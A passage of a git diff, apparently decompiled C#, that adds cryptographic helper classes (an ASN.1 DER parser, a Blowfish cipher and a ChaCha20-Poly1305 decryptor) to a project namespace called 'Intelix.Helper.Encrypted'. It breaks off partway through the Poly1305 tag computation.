b/New/Intelix.Helper.Encrypted/Asn1Der.cs new file mode 100644 index 0000000..5257a0e --- /dev/null +++ b/New/Intelix.Helper.Encrypted/Asn1Der.cs @@ -0,0 +1,95 @@ +using System; + +namespace Intelix.Helper.Encrypted; + +public class Asn1Der +{ + public enum Type + { + Sequence = 48, + Integer = 2, + OctetString = 4, + ObjectIdentifier = 6 + } + + public Asn1DerObject Parse(byte[] toParse) + { + Asn1DerObject asn1DerObject = new Asn1DerObject(); + for (int i = 0; i < toParse.Length; i++) + { + switch ((Type)toParse[i]) + { + case Type.Sequence: + { + byte[] array; + if (asn1DerObject.Lenght == 0) + { + asn1DerObject.Type = Type.Sequence; + asn1DerObject.Lenght = toParse.Length - (i + 2); + array = new byte[asn1DerObject.Lenght]; + } + else + { + asn1DerObject.Objects.Add(new Asn1DerObject + { + Type = Type.Sequence, + Lenght = toParse[i + 1] + }); + array = new byte[toParse[i + 1]]; + } + int length = ((array.Length > toParse.Length - (i + 2)) ? (toParse.Length - (i + 2)) : array.Length); + Array.Copy(toParse, i + 2, array, 0, length); + asn1DerObject.Objects.Add(Parse(array)); + i = i + 1 + toParse[i + 1]; + break; + } + case Type.Integer: + { + asn1DerObject.Objects.Add(new Asn1DerObject + { + Type = Type.Integer, + Lenght = toParse[i + 1] + }); + byte[] array = new byte[toParse[i + 1]]; + int length = ((i + 2 + toParse[i + 1] > toParse.Length) ? (toParse.Length - (i + 2)) : toParse[i + 1]); + Array.Copy(toParse, i + 2, array, 0, length); + Asn1DerObject[] array3 = asn1DerObject.Objects.ToArray(); + asn1DerObject.Objects[array3.Length - 1].Data = array; + i = i + 1 + asn1DerObject.Objects[array3.Length - 1].Lenght; + break; + } + case Type.OctetString: + { + asn1DerObject.Objects.Add(new Asn1DerObject + { + Type = Type.OctetString, + Lenght = toParse[i + 1] + }); + byte[] array = new byte[toParse[i + 1]]; + int length = ((i + 2 + toParse[i + 1] > toParse.Length) ? (toParse.Length - (i + 2)) : toParse[i + 1]); + Array.Copy(toParse, i + 2, array, 0, length); + Asn1DerObject[] array4 = asn1DerObject.Objects.ToArray(); + asn1DerObject.Objects[array4.Length - 1].Data = array; + i = i + 1 + asn1DerObject.Objects[array4.Length - 1].Lenght; + break; + } + case Type.ObjectIdentifier: + { + asn1DerObject.Objects.Add(new Asn1DerObject + { + Type = Type.ObjectIdentifier, + Lenght = toParse[i + 1] + }); + byte[] array = new byte[toParse[i + 1]]; + int length = ((i + 2 + toParse[i + 1] > toParse.Length) ? (toParse.Length - (i + 2)) : toParse[i + 1]); + Array.Copy(toParse, i + 2, array, 0, length); + Asn1DerObject[] array2 = asn1DerObject.Objects.ToArray(); + asn1DerObject.Objects[array2.Length - 1].Data = array; + i = i + 1 + asn1DerObject.Objects[array2.Length - 1].Lenght; + break; + } + } + } + return asn1DerObject; + } +} diff --git a/New/Intelix.Helper.Encrypted/Asn1DerObject.cs b/New/Intelix.Helper.Encrypted/Asn1DerObject.cs new file mode 100644 index 0000000..1b78c93 --- /dev/null +++ b/New/Intelix.Helper.Encrypted/Asn1DerObject.cs @@ -0,0 +1,71 @@ +using System.Collections.Generic; +using System.Text; + +namespace Intelix.Helper.Encrypted; + +public class Asn1DerObject +{ + public Asn1Der.Type Type { get; set; } + + public int Lenght { get; set; } + + public List Objects { get; } + + public byte[] Data { get; set; } + + public Asn1DerObject() + { + Objects = new List(); + } + + public override string ToString() + { + StringBuilder stringBuilder = new StringBuilder(); + StringBuilder stringBuilder2 = new StringBuilder(); + switch (Type) + { + case Asn1Der.Type.Sequence: + stringBuilder.AppendLine("SEQUENCE {"); + break; + case Asn1Der.Type.Integer: + { + byte[] data = Data; + foreach (byte b3 in data) + { + stringBuilder2.AppendFormat("{0:X2}", b3); + } + stringBuilder.AppendLine("\tINTEGER " + stringBuilder2); + break; + } + case Asn1Der.Type.OctetString: + { + byte[] data = Data; + foreach (byte b2 in data) + { + stringBuilder2.AppendFormat("{0:X2}", b2); + } + stringBuilder.AppendLine("\tOCTETSTRING " + stringBuilder2); + break; + } + case Asn1Der.Type.ObjectIdentifier: + { + byte[] data = Data; + foreach (byte b in data) + { + stringBuilder2.AppendFormat("{0:X2}", b); + } + stringBuilder.AppendLine("\tOBJECTIDENTIFIER " + stringBuilder2); + break; + } + } + foreach (Asn1DerObject @object in Objects) + { + stringBuilder.Append(@object); + } + if (Type.Equals(Asn1Der.Type.Sequence)) + { + stringBuilder.AppendLine("}"); + } + return stringBuilder.ToString(); + } +} diff --git a/New/Intelix.Helper.Encrypted/Blowfish.cs b/New/Intelix.Helper.Encrypted/Blowfish.cs new file mode 100644 index 0000000..fea71ff --- /dev/null +++ b/New/Intelix.Helper.Encrypted/Blowfish.cs @@ -0,0 +1,311 @@ +using System; + +namespace Intelix.Helper.Encrypted; + +public class Blowfish +{ + public enum Endian + { + Little, + Big + } + + public readonly int MinUserKeyLength = 1; + + public readonly int MaxUserKeyLength = 56; + + public readonly int BlockSize = 8; + + private readonly uint[] OriginPBox = new uint[18] + { + 608135816u, 2242054355u, 320440878u, 57701188u, 2752067618u, 698298832u, 137296536u, 3964562569u, 1160258022u, 953160567u, + 3193202383u, 887688300u, 3232508343u, 3380367581u, 1065670069u, 3041331479u, 2450970073u, 2306472731u + }; + + private readonly uint[,] OriginSBox = new uint[4, 256] + { + { + 3509652390u, 2564797868u, 805139163u, 3491422135u, 3101798381u, 1780907670u, 3128725573u, 4046225305u, 614570311u, 3012652279u, + 134345442u, 2240740374u, 1667834072u, 1901547113u, 2757295779u, 4103290238u, 227898511u, 1921955416u, 1904987480u, 2182433518u, + 2069144605u, 3260701109u, 2620446009u, 720527379u, 3318853667u, 677414384u, 3393288472u, 3101374703u, 2390351024u, 1614419982u, + 1822297739u, 2954791486u, 3608508353u, 3174124327u, 2024746970u, 1432378464u, 3864339955u, 2857741204u, 1464375394u, 1676153920u, + 1439316330u, 715854006u, 3033291828u, 289532110u, 2706671279u, 2087905683u, 3018724369u, 1668267050u, 732546397u, 1947742710u, + 3462151702u, 2609353502u, 2950085171u, 1814351708u, 2050118529u, 680887927u, 999245976u, 1800124847u, 3300911131u, 1713906067u, + 1641548236u, 4213287313u, 1216130144u, 1575780402u, 4018429277u, 3917837745u, 3693486850u, 3949271944u, 596196993u, 3549867205u, + 258830323u, 2213823033u, 772490370u, 2760122372u, 1774776394u, 2652871518u, 566650946u, 4142492826u, 1728879713u, 2882767088u, + 1783734482u, 3629395816u, 2517608232u, 2874225571u, 1861159788u, 326777828u, 3124490320u, 2130389656u, 2716951837u, 967770486u, + 1724537150u, 2185432712u, 2364442137u, 1164943284u, 2105845187u, 998989502u, 3765401048u, 2244026483u, 1075463327u, 1455516326u, + 1322494562u, 910128902u, 469688178u, 1117454909u, 936433444u, 3490320968u, 3675253459u, 1240580251u, 122909385u, 2157517691u, + 634681816u, 4142456567u, 3825094682u, 3061402683u, 2540495037u, 79693498u, 3249098678u, 1084186820u, 1583128258u, 426386531u, + 1761308591u, 1047286709u, 322548459u, 995290223u, 1845252383u, 2603652396u, 3431023940u, 2942221577u, 3202600964u, 3727903485u, + 1712269319u, 422464435u, 3234572375u, 1170764815u, 3523960633u, 3117677531u, 1434042557u, 442511882u, 3600875718u, 1076654713u, + 1738483198u, 4213154764u, 2393238008u, 3677496056u, 1014306527u, 4251020053u, 793779912u, 2902807211u, 842905082u, 4246964064u, + 1395751752u, 1040244610u, 2656851899u, 3396308128u, 445077038u, 3742853595u, 3577915638u, 679411651u, 2892444358u, 2354009459u, + 1767581616u, 3150600392u, 3791627101u, 3102740896u, 284835224u, 4246832056u, 1258075500u, 768725851u, 2589189241u, 3069724005u, + 3532540348u, 1274779536u, 3789419226u, 2764799539u, 1660621633u, 3471099624u, 4011903706u, 913787905u, 3497959166u, 737222580u, + 2514213453u, 2928710040u, 3937242737u, 1804850592u, 3499020752u, 2949064160u, 2386320175u, 2390070455u, 2415321851u, 4061277028u, + 2290661394u, 2416832540u, 1336762016u, 1754252060u, 3520065937u, 3014181293u, 791618072u, 3188594551u, 3933548030u, 2332172193u, + 3852520463u, 3043980520u, 413987798u, 3465142937u, 3030929376u, 4245938359u, 2093235073u, 3534596313u, 375366246u, 2157278981u, + 2479649556u, 555357303u, 3870105701u, 2008414854u, 3344188149u, 4221384143u, 3956125452u, 2067696032u, 3594591187u, 2921233993u, + 2428461u, 544322398u, 577241275u, 1471733935u, 610547355u, 4027169054u, 1432588573u, 1507829418u, 2025931657u, 3646575487u, + 545086370u, 48609733u, 2200306550u, 1653985193u, 298326376u, 1316178497u, 3007786442u, 2064951626u, 458293330u, 2589141269u, + 3591329599u, 3164325604u, 727753846u, 2179363840u, 146436021u, 1461446943u, 4069977195u, 705550613u, 3059967265u, 3887724982u, + 4281599278u, 3313849956u, 1404054877u, 2845806497u, 146425753u, 1854211946u + }, + { + 1266315497u, 3048417604u, 3681880366u, 3289982499u, 2909710000u, 1235738493u, 2632868024u, 2414719590u, 3970600049u, 1771706367u, + 1449415276u, 3266420449u, 422970021u, 1963543593u, 2690192192u, 3826793022u, 1062508698u, 1531092325u, 1804592342u, 2583117782u, + 2714934279u, 4024971509u, 1294809318u, 4028980673u, 1289560198u, 2221992742u, 1669523910u, 35572830u, 157838143u, 1052438473u, + 1016535060u, 1802137761u, 1753167236u, 1386275462u, 3080475397u, 2857371447u, 1040679964u, 2145300060u, 2390574316u, 1461121720u, + 2956646967u, 4031777805u, 4028374788u, 33600511u, 2920084762u, 1018524850u, 629373528u, 3691585981u, 3515945977u, 2091462646u, + 2486323059u, 586499841u, 988145025u, 935516892u, 3367335476u, 2599673255u, 2839830854u, 265290510u, 3972581182u, 2759138881u, + 3795373465u, 1005194799u, 847297441u, 406762289u, 1314163512u, 1332590856u, 1866599683u, 4127851711u, 750260880u, 613907577u, + 1450815602u, 3165620655u, 3734664991u, 3650291728u, 3012275730u, 3704569646u, 1427272223u, 778793252u, 1343938022u, 2676280711u, + 2052605720u, 1946737175u, 3164576444u, 3914038668u, 3967478842u, 3682934266u, 1661551462u, 3294938066u, 4011595847u, 840292616u, + 3712170807u, 616741398u, 312560963u, 711312465u, 1351876610u, 322626781u, 1910503582u, 271666773u, 2175563734u, 1594956187u, + 70604529u, 3617834859u, 1007753275u, 1495573769u, 4069517037u, 2549218298u, 2663038764u, 504708206u, 2263041392u, 3941167025u, + 2249088522u, 1514023603u, 1998579484u, 1312622330u, 694541497u, 2582060303u, 2151582166u, 1382467621u, 776784248u, 2618340202u, + 3323268794u, 2497899128u, 2784771155u, 503983604u, 4076293799u, 907881277u, 423175695u, 432175456u, 1378068232u, 4145222326u, + 3954048622u, 3938656102u, 3820766613u, 2793130115u, 2977904593u, 26017576u, 3274890735u, 3194772133u, 1700274565u, 1756076034u, + 4006520079u, 3677328699u, 720338349u, 1533947780u, 354530856u, 688349552u, 3973924725u, 1637815568u, 332179504u, 3949051286u, + 53804574u, 2852348879u, 3044236432u, 1282449977u, 3583942155u, 3416972820u, 4006381244u, 1617046695u, 2628476075u, 3002303598u, + 1686838959u, 431878346u, 2686675385u, 1700445008u, 1080580658u, 1009431731u, 832498133u, 3223435511u, 2605976345u, 2271191193u, + 2516031870u, 1648197032u, 4164389018u, 2548247927u, 300782431u, 375919233u, 238389289u, 3353747414u, 2531188641u, 2019080857u, + 1475708069u, 455242339u, 2609103871u, 448939670u, 3451063019u, 1395535956u, 2413381860u, 1841049896u, 1491858159u, 885456874u, + 4264095073u, 4001119347u, 1565136089u, 3898914787u, 1108368660u, 540939232u, 1173283510u, 2745871338u, 3681308437u, 4207628240u, + 3343053890u, 4016749493u, 1699691293u, 1103962373u, 3625875870u, 2256883143u, 3830138730u, 1031889488u, 3479347698u, 1535977030u, + 4236805024u, 3251091107u, 2132092099u, 1774941330u, 1199868427u, 1452454533u, 157007616u, 2904115357u, 342012276u, 595725824u, + 1480756522u, 206960106u, 497939518u, 591360097u, 863170706u, 2375253569u, 3596610801u, 1814182875u, 2094937945u, 3421402208u, + 1082520231u, 3463918190u, 2785509508u, 435703966u, 3908032597u, 1641649973u, 2842273706u, 3305899714u, 1510255612u, 2148256476u, + 2655287854u, 3276092548u, 4258621189u, 236887753u, 3681803219u, 274041037u, 1734335097u, 3815195456u, 3317970021u, 1899903192u, + 1026095262u, 4050517792u, 356393447u, 2410691914u, 3873677099u, 3682840055u + }, + { + 3913112168u, 2491498743u, 4132185628u, 2489919796u, 1091903735u, 1979897079u, 3170134830u, 3567386728u, 3557303409u, 857797738u, + 1136121015u, 1342202287u, 507115054u, 2535736646u, 337727348u, 3213592640u, 1301675037u, 2528481711u, 1895095763u, 1721773893u, + 3216771564u, 62756741u, 2142006736u, 835421444u, 2531993523u, 1442658625u, 3659876326u, 2882144922u, 676362277u, 1392781812u, + 170690266u, 3921047035u, 1759253602u, 3611846912u, 1745797284u, 664899054u, 1329594018u, 3901205900u, 3045908486u, 2062866102u, + 2865634940u, 3543621612u, 3464012697u, 1080764994u, 553557557u, 3656615353u, 3996768171u, 991055499u, 499776247u, 1265440854u, + 648242737u, 3940784050u, 980351604u, 3713745714u, 1749149687u, 3396870395u, 4211799374u, 3640570775u, 1161844396u, 3125318951u, + 1431517754u, 545492359u, 4268468663u, 3499529547u, 1437099964u, 2702547544u, 3433638243u, 2581715763u, 2787789398u, 1060185593u, + 1593081372u, 2418618748u, 4260947970u, 69676912u, 2159744348u, 86519011u, 2512459080u, 3838209314u, 1220612927u, 3339683548u, + 133810670u, 1090789135u, 1078426020u, 1569222167u, 845107691u, 3583754449u, 4072456591u, 1091646820u, 628848692u, 1613405280u, + 3757631651u, 526609435u, 236106946u, 48312990u, 2942717905u, 3402727701u, 1797494240u, 859738849u, 992217954u, 4005476642u, + 2243076622u, 3870952857u, 3732016268u, 765654824u, 3490871365u, 2511836413u, 1685915746u, 3888969200u, 1414112111u, 2273134842u, + 3281911079u, 4080962846u, 172450625u, 2569994100u, 980381355u, 4109958455u, 2819808352u, 2716589560u, 2568741196u, 3681446669u, + 3329971472u, 1835478071u, 660984891u, 3704678404u, 4045999559u, 3422617507u, 3040415634u, 1762651403u, 1719377915u, 3470491036u, + 2693910283u, 3642056355u, 3138596744u, 1364962596u, 2073328063u, 1983633131u, 926494387u, 3423689081u, 2150032023u, 4096667949u, + 1749200295u, 3328846651u, 309677260u, 2016342300u, 1779581495u, 3079819751u, 111262694u, 1274766160u, 443224088u, 298511866u, + 1025883608u, 3806446537u, 1145181785u, 168956806u, 3641502830u, 3584813610u, 1689216846u, 3666258015u, 3200248200u, 1692713982u, + 2646376535u, 4042768518u, 1618508792u, 1610833997u, 3523052358u, 4130873264u, 2001055236u, 3610705100u, 2202168115u, 4028541809u, + 2961195399u, 1006657119u, 2006996926u, 3186142756u, 1430667929u, 3210227297u, 1314452623u, 4074634658u, 4101304120u, 2273951170u, + 1399257539u, 3367210612u, 3027628629u, 1190975929u, 2062231137u, 2333990788u, 2221543033u, 2438960610u, 1181637006u, 548689776u, + 2362791313u, 3372408396u, 3104550113u, 3145860560u, 296247880u, 1970579870u, 3078560182u, 3769228297u, 1714227617u, 3291629107u, + 3898220290u, 166772364u, 1251581989u, 493813264u, 448347421u, 195405023u, 2709975567u, 677966185u, 3703036547u, 1463355134u, + 2715995803u, 1338867538u, 1343315457u, 2802222074u, 2684532164u, 233230375u, 2599980071u, 2000651841u, 3277868038u, 1638401717u, + 4028070440u, 3237316320u, 6314154u, 819756386u, 300326615u, 590932579u, 1405279636u, 3267499572u, 3150704214u, 2428286686u, + 3959192993u, 3461946742u, 1862657033u, 1266418056u, 963775037u, 2089974820u, 2263052895u, 1917689273u, 448879540u, 3550394620u, + 3981727096u, 150775221u, 3627908307u, 1303187396u, 508620638u, 2975983352u, 2726630617u, 1817252668u, 1876281319u, 1457606340u, + 908771278u, 3720792119u, 3617206836u, 2455994898u, 1729034894u, 1080033504u + }, + { + 976866871u, 3556439503u, 2881648439u, 1522871579u, 1555064734u, 1336096578u, 3548522304u, 2579274686u, 3574697629u, 3205460757u, + 3593280638u, 3338716283u, 3079412587u, 564236357u, 2993598910u, 1781952180u, 1464380207u, 3163844217u, 3332601554u, 1699332808u, + 1393555694u, 1183702653u, 3581086237u, 1288719814u, 691649499u, 2847557200u, 2895455976u, 3193889540u, 2717570544u, 1781354906u, + 1676643554u, 2592534050u, 3230253752u, 1126444790u, 2770207658u, 2633158820u, 2210423226u, 2615765581u, 2414155088u, 3127139286u, + 673620729u, 2805611233u, 1269405062u, 4015350505u, 3341807571u, 4149409754u, 1057255273u, 2012875353u, 2162469141u, 2276492801u, + 2601117357u, 993977747u, 3918593370u, 2654263191u, 753973209u, 36408145u, 2530585658u, 25011837u, 3520020182u, 2088578344u, + 530523599u, 2918365339u, 1524020338u, 1518925132u, 3760827505u, 3759777254u, 1202760957u, 3985898139u, 3906192525u, 674977740u, + 4174734889u, 2031300136u, 2019492241u, 3983892565u, 4153806404u, 3822280332u, 352677332u, 2297720250u, 60907813u, 90501309u, + 3286998549u, 1016092578u, 2535922412u, 2839152426u, 457141659u, 509813237u, 4120667899u, 652014361u, 1966332200u, 2975202805u, + 55981186u, 2327461051u, 676427537u, 3255491064u, 2882294119u, 3433927263u, 1307055953u, 942726286u, 933058658u, 2468411793u, + 3933900994u, 4215176142u, 1361170020u, 2001714738u, 2830558078u, 3274259782u, 1222529897u, 1679025792u, 2729314320u, 3714953764u, + 1770335741u, 151462246u, 3013232138u, 1682292957u, 1483529935u, 471910574u, 1539241949u, 458788160u, 3436315007u, 1807016891u, + 3718408830u, 978976581u, 1043663428u, 3165965781u, 1927990952u, 4200891579u, 2372276910u, 3208408903u, 3533431907u, 1412390302u, + 2931980059u, 4132332400u, 1947078029u, 3881505623u, 4168226417u, 2941484381u, 1077988104u, 1320477388u, 886195818u, 18198404u, + 3786409000u, 2509781533u, 112762804u, 3463356488u, 1866414978u, 891333506u, 18488651u, 661792760u, 1628790961u, 3885187036u, + 3141171499u, 876946877u, 2693282273u, 1372485963u, 791857591u, 2686433993u, 3759982718u, 3167212022u, 3472953795u, 2716379847u, + 445679433u, 3561995674u, 3504004811u, 3574258232u, 54117162u, 3331405415u, 2381918588u, 3769707343u, 4154350007u, 1140177722u, + 4074052095u, 668550556u, 3214352940u, 367459370u, 261225585u, 2610173221u, 4209349473u, 3468074219u, 3265815641u, 314222801u, + 3066103646u, 3808782860u, 282218597u, 3406013506u, 3773591054u, 379116347u, 1285071038u, 846784868u, 2669647154u, 3771962079u, + 3550491691u, 2305946142u, 453669953u, 1268987020u, 3317592352u, 3279303384u, 3744833421u, 2610507566u, 3859509063u, 266596637u, + 3847019092u, 517658769u, 3462560207u, 3443424879u, 370717030u, 4247526661u, 2224018117u, 4143653529u, 4112773975u, 2788324899u, + 2477274417u, 1456262402u, 2901442914u, 1517677493u, 1846949527u, 2295493580u, 3734397586u, 2176403920u, 1280348187u, 1908823572u, + 3871786941u, 846861322u, 1172426758u, 3287448474u, 3383383037u, 1655181056u, 3139813346u, 901632758u, 1897031941u, 2986607138u, + 3066810236u, 3447102507u, 1393639104u, 373351379u, 950779232u, 625454576u, 3124240540u, 4148612726u, 2007998917u, 544563296u, + 2244738638u, 2330496472u, 2058025392u, 1291430526u, 424198748u, 50039436u, 29584100u, 3605783033u, 2429876329u, 2791104160u, + 1057563949u, 3255363231u, 3075367218u, 3463963227u, 1469046755u, 985887462u + } + }; + + private uint[] SubKey; + + private uint[,] SBox; + + private uint _F_Transform(uint x) + { + byte[] bytes = BitConverter.GetBytes(x); + if (!BitConverter.IsLittleEndian) + { + Array.Reverse(bytes); + } + return ((SBox[0, bytes[3]] + SBox[1, bytes[2]]) ^ SBox[2, bytes[1]]) + SBox[3, bytes[0]]; + } + + public void Encrypt(byte[] srcBytes, Endian endian) + { + byte[] array = new byte[4]; + byte[] array2 = new byte[4]; + Array.Copy(srcBytes, 0, array, 0, 4); + Array.Copy(srcBytes, 4, array2, 0, 4); + if ((BitConverter.IsLittleEndian && endian == Endian.Big) || (!BitConverter.IsLittleEndian && endian == Endian.Little)) + { + Array.Reverse(array); + Array.Reverse(array2); + } + uint num = BitConverter.ToUInt32(array, 0); + uint num2 = BitConverter.ToUInt32(array2, 0); + num ^= SubKey[0]; + num2 ^= _F_Transform(num); + num2 ^= SubKey[1]; + num ^= _F_Transform(num2); + num ^= SubKey[2]; + num2 ^= _F_Transform(num); + num2 ^= SubKey[3]; + num ^= _F_Transform(num2); + num ^= SubKey[4]; + num2 ^= _F_Transform(num); + num2 ^= SubKey[5]; + num ^= _F_Transform(num2); + num ^= SubKey[6]; + num2 ^= _F_Transform(num); + num2 ^= SubKey[7]; + num ^= _F_Transform(num2); + num ^= SubKey[8]; + num2 ^= _F_Transform(num); + num2 ^= SubKey[9]; + num ^= _F_Transform(num2); + num ^= SubKey[10]; + num2 ^= _F_Transform(num); + num2 ^= SubKey[11]; + num ^= _F_Transform(num2); + num ^= SubKey[12]; + num2 ^= _F_Transform(num); + num2 ^= SubKey[13]; + num ^= _F_Transform(num2); + num ^= SubKey[14]; + num2 ^= _F_Transform(num); + num2 ^= SubKey[15]; + num ^= _F_Transform(num2); + num ^= SubKey[16]; + num2 ^= SubKey[17]; + array = BitConverter.GetBytes(num2); + array2 = BitConverter.GetBytes(num); + if ((BitConverter.IsLittleEndian && endian == Endian.Big) || (!BitConverter.IsLittleEndian && endian == Endian.Little)) + { + Array.Reverse(array); + Array.Reverse(array2); + } + Array.Copy(array, 0, srcBytes, 0, 4); + Array.Copy(array2, 0, srcBytes, 4, 4); + } + + public void Decrypt(byte[] srcBytes, Endian endian) + { + byte[] array = new byte[4]; + byte[] array2 = new byte[4]; + Array.Copy(srcBytes, 0, array, 0, 4); + Array.Copy(srcBytes, 4, array2, 0, 4); + if ((BitConverter.IsLittleEndian && endian == Endian.Big) || (!BitConverter.IsLittleEndian && endian == Endian.Little)) + { + Array.Reverse(array); + Array.Reverse(array2); + } + uint num = BitConverter.ToUInt32(array2, 0); + uint num2 = BitConverter.ToUInt32(array, 0); + num ^= SubKey[16]; + num2 ^= SubKey[17]; + num ^= _F_Transform(num2); + num2 ^= SubKey[15]; + num2 ^= _F_Transform(num); + num ^= SubKey[14]; + num ^= _F_Transform(num2); + num2 ^= SubKey[13]; + num2 ^= _F_Transform(num); + num ^= SubKey[12]; + num ^= _F_Transform(num2); + num2 ^= SubKey[11]; + num2 ^= _F_Transform(num); + num ^= SubKey[10]; + num ^= _F_Transform(num2); + num2 ^= SubKey[9]; + num2 ^= _F_Transform(num); + num ^= SubKey[8]; + num ^= _F_Transform(num2); + num2 ^= SubKey[7]; + num2 ^= _F_Transform(num); + num ^= SubKey[6]; + num ^= _F_Transform(num2); + num2 ^= SubKey[5]; + num2 ^= _F_Transform(num); + num ^= SubKey[4]; + num ^= _F_Transform(num2); + num2 ^= SubKey[3]; + num2 ^= _F_Transform(num); + num ^= SubKey[2]; + num ^= _F_Transform(num2); + num2 ^= SubKey[1]; + num2 ^= _F_Transform(num); + num ^= SubKey[0]; + array = BitConverter.GetBytes(num); + array2 = BitConverter.GetBytes(num2); + if ((BitConverter.IsLittleEndian && endian == Endian.Big) || (!BitConverter.IsLittleEndian && endian == Endian.Little)) + { + Array.Reverse(array); + Array.Reverse(array2); + } + Array.Copy(array, 0, srcBytes, 0, 4); + Array.Copy(array2, 0, srcBytes, 4, 4); + } + + public Blowfish(byte[] UserKey) + { + if (UserKey.Length < MinUserKeyLength) + { + throw new ArgumentException("UserKey is too short."); + } + if (UserKey.Length > 56) + { + throw new ArgumentException("UserKey is too long."); + } + SubKey = OriginPBox.Clone() as uint[]; + SBox = OriginSBox.Clone() as uint[,]; + for (int i = 0; i < 18; i++) + { + uint num = 0u; + num <<= 8; + num |= UserKey[i * 4 % UserKey.Length]; + num <<= 8; + num |= UserKey[(i * 4 + 1) % UserKey.Length]; + num <<= 8; + num |= UserKey[(i * 4 + 2) % UserKey.Length]; + num <<= 8; + num |= UserKey[(i * 4 + 3) % UserKey.Length]; + SubKey[i] ^= num; + } + byte[] array = new byte[8]; + for (int j = 0; j < 9; j++) + { + Encrypt(array, Endian.Little); + Buffer.BlockCopy(array, 0, SubKey, 8 * j, 8); + } + for (int k = 0; k < 4; k++) + { + for (int l = 0; l < 128; l++) + { + Encrypt(array, Endian.Little); + Buffer.BlockCopy(array, 0, SBox, 1024 * k + 8 * l, 8); + } + } + } +} diff --git a/New/Intelix.Helper.Encrypted/ChaCha20Poly1305.cs b/New/Intelix.Helper.Encrypted/ChaCha20Poly1305.cs new file mode 100644 index 0000000..d93f378 --- /dev/null +++ b/New/Intelix.Helper.Encrypted/ChaCha20Poly1305.cs @@ -0,0 +1,244 @@ +using System; +using System.Numerics; +using System.Security.Cryptography; + +namespace Intelix.Helper.Encrypted; + +public static class ChaCha20Poly1305 +{ + public static byte[] Decrypt(byte[] key32, byte[] iv12, byte[] ciphertext, byte[] tag, byte[] aad = null) + { + if (key32 == null) + { + throw new ArgumentNullException("key32"); + } + if (key32.Length != 32) + { + throw new ArgumentException("Key must be 32 bytes", "key32"); + } + if (iv12 == null) + { + throw new ArgumentNullException("iv12"); + } + if (iv12.Length != 12) + { + throw new ArgumentException("IV must be 12 bytes", "iv12"); + } + if (ciphertext == null) + { + throw new ArgumentNullException("ciphertext"); + } + if (tag == null) + { + throw new ArgumentNullException("tag"); + } + if (tag.Length != 16) + { + throw new ArgumentException("Tag must be 16 bytes", "tag"); + } + if (aad == null) + { + aad = Array.Empty(); + } + byte[] array = ChaCha20Block(key32, 0u, iv12); + byte[] array2 = new byte[32]; + Buffer.BlockCopy(array, 0, array2, 0, 32); + byte[] msg = BuildPoly1305Message(aad, ciphertext); + if (!FixedTimeEquals(Poly1305TagWithBigInteger(array2, msg), tag)) + { + Array.Clear(array, 0, array.Length); + Array.Clear(array2, 0, array2.Length); + throw new CryptographicException("ChaCha20-Poly1305 authentication failed (tag mismatch)."); + } + byte[] array3 = new byte[ciphertext.Length]; + ChaCha20Xor(key32, 1u, iv12, ciphertext, array3); + Array.Clear(array, 0, array.Length); + Array.Clear(array2, 0, array2.Length); + return array3; + } + + private static byte[] ChaCha20Block(byte[] key32, uint counter, byte[] nonce12) + { + uint[] array = new uint[16] + { + 1634760805u, 857760878u, 2036477234u, 1797285236u, 0u, 0u, 0u, 0u, 0u, 0u, + 0u, 0u, 0u, 0u, 0u, 0u + }; + for (int i = 0; i < 8; i++) + { + array[4 + i] = ToUInt32Little(key32, i * 4); + } + array[12] = counter; + array[13] = ToUInt32Little(nonce12, 0); + array[14] = ToUInt32Little(nonce12, 4); + array[15] = ToUInt32Little(nonce12, 8); + uint[] array2 = new uint[16]; + Array.Copy(array, array2, 16); + for (int j = 0; j < 10; j++) + { + QuarterRound(ref array2[0], ref array2[4], ref array2[8], ref array2[12]); + QuarterRound(ref array2[1], ref array2[5], ref array2[9], ref array2[13]); + QuarterRound(ref array2[2], ref array2[6], ref array2[10], ref array2[14]); + QuarterRound(ref array2[3], ref array2[7], ref array2[11], ref array2[15]); + QuarterRound(ref array2[0], ref array2[5], ref array2[10], ref array2[15]); + QuarterRound(ref array2[1], ref array2[6], ref array2[11], ref array2[12]); + QuarterRound(ref array2[2], ref array2[7], ref array2[8], ref array2[13]); + QuarterRound(ref array2[3], ref array2[4], ref array2[9], ref array2[14]); + } + byte[] array3 = new byte[64]; + for (int k = 0; k < 16; k++) + { + LittleEndian(array2[k] + array[k], array3, k * 4); + } + return array3; + } + + private static void QuarterRound(ref uint a, ref uint b, ref uint c, ref uint d) + { + a += b; + d ^= a; + d = Rol(d, 16); + c += d; + b ^= c; + b = Rol(b, 12); + a += b; + d ^= a; + d = Rol(d, 8); + c += d; + b ^= c; + b = Rol(b, 7); + } + + private static uint Rol(uint x, int n) + { + return (x << n) | (x >> 32 - n); + } + + private static uint ToUInt32Little(byte[] bs, int off) + { + return (uint)(bs[off] | (bs[off + 1] << 8) | (bs[off + 2] << 16) | (bs[off + 3] << 24)); + } + + private static void LittleEndian(uint v, byte[] outbuf, int off) + { + outbuf[off] = (byte)(v & 0xFF); + outbuf[off + 1] = (byte)((v >> 8) & 0xFF); + outbuf[off + 2] = (byte)((v >> 16) & 0xFF); + outbuf[off + 3] = (byte)((v >> 24) & 0xFF); + } + + private static void ChaCha20Xor(byte[] key, uint counter, byte[] nonce, byte[] input, byte[] output) + { + if (input == null || input.Length == 0) + { + return; + } + int i = 0; + uint num = counter; + int num2; + for (; i < input.Length; i += num2) + { + byte[] array = ChaCha20Block(key, num, nonce); + num++; + num2 = Math.Min(64, input.Length - i); + for (int j = 0; j < num2; j++) + { + output[i + j] = (byte)(input[i + j] ^ array[j]); + } + } + } + + private static byte[] BuildPoly1305Message(byte[] aad, byte[] ciphertext) + { + int num = ((aad != null) ? aad.Length : 0); + int num2 = ((ciphertext != null) ? ciphertext.Length : 0); + int num3 = (16 - num % 16) % 16; + int num4 = (16 - num2 % 16) % 16; + byte[] array = new byte[num + num3 + num2 + num4 + 8 + 8]; + int num5 = 0; + if (num > 0) + { + Buffer.BlockCopy(aad, 0, array, num5, num); + num5 += num; + } + if (num3 > 0) + { + num5 += num3; + } + if (num2 > 0) + { + Buffer.BlockCopy(ciphertext, 0, array, num5, num2); + num5 += num2; + } + if (num4 > 0) + { + num5 += num4; + } + byte[] bytes = BitConverter.GetBytes((ulong)num); + byte[] bytes2 = BitConverter.GetBytes((ulong)num2); + Buffer.BlockCopy(bytes, 0, array, num5, 8); + num5 += 8; + Buffer.BlockCopy(bytes2, 0, array, num5, 8); + num5 += 8; + return array; + } + + private static byte[] Poly1305TagWithBigInteger(byte[] oneTimeKey32, byte[] msg) + { + byte[] array = new byte[16]; + Buffer.BlockCopy(oneTimeKey32, 0, array, 0, 16); + array[3] &= 15; + array[7] &= 15; 